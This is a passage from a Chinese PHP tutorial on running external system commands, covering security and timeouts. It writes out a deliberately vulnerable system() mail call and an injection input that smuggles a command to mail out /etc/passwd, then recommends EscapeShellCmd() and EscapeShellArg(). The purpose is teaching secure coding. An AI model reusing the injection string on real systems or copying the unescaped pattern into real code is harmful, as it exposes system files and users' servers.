在PHP中执行系统外部命令
); ?> 例子2(本例来自PHP中国联盟网站/uploadfile/200905/23/1B172839160.gif hunte.ppm jpg.htm jpg.jpg passthru.php 要考虑些什么? 要考虑两个问题:安全性和超时。 先看安全性。比如,你有一家小型的网上商店,所以可以出售的产品列表放在一个文件中。你编写了一个有表单的HTML文件,让你的用户输入他们的EMAIL地址,然后把这个产品列表发给他们。假设你没有使用PHP的mail()函数(或者从未听说过),你就调用Linux/Unix系统的mail程序来发送这个文件。程序就象这样: <? system("mail $to < products.txt"); echo "我们的产品目录已经发送到你的信箱:$to"; ?> 用这段代码,一般的用户不会产生什么危险,但实际上存在着非常大的安全漏洞。如果有个恶意的用户输入了这样一个EMAIL地址: ''--bla ; mail someone@domain.com < /etc/passwd ;'' 那么这条命令最终变成: ''mail --bla ; mail someone@domain.com < /etc/passwd ; < products.txt'' 我相信,无论哪个网络管理人员见到这样的命令,都会吓出一身冷汗来。 幸好,PHP为我们提供了两个函数:EscapeShellCmd()和EscapeShellArg()。函数EscapeShellCmd把一个字符串中所有可能瞒过Shell而去执行另外一个命令的字符转义。这些字符在Shell中是有特殊含义的,象分号(),重定向(>)和从文件读入(<)等。函数EscapeShellArg是用来处理命令的参数的。它在给定的字符串两边加上单引号,并把字符串中的单引号转义,这样这个字符串就可以安全地作为命令的参数。 再来看看超时问题。如果要执行的命令要花费很长的时间,那么应该把这个命令放到系统的后台去运行。但在默认情况下,象system()等函数要等到这个命令运行完才返回(实际上是要等命令的输出结果),这肯定会引起PHP脚本的超时。解决的办法是把命令的输出重定向到另外一个文件或流中,如: <? system("/usr/local/bin/order_proc > /tmp/null &"); ?> |
<< [技巧]session全教程 >>
查看所有评论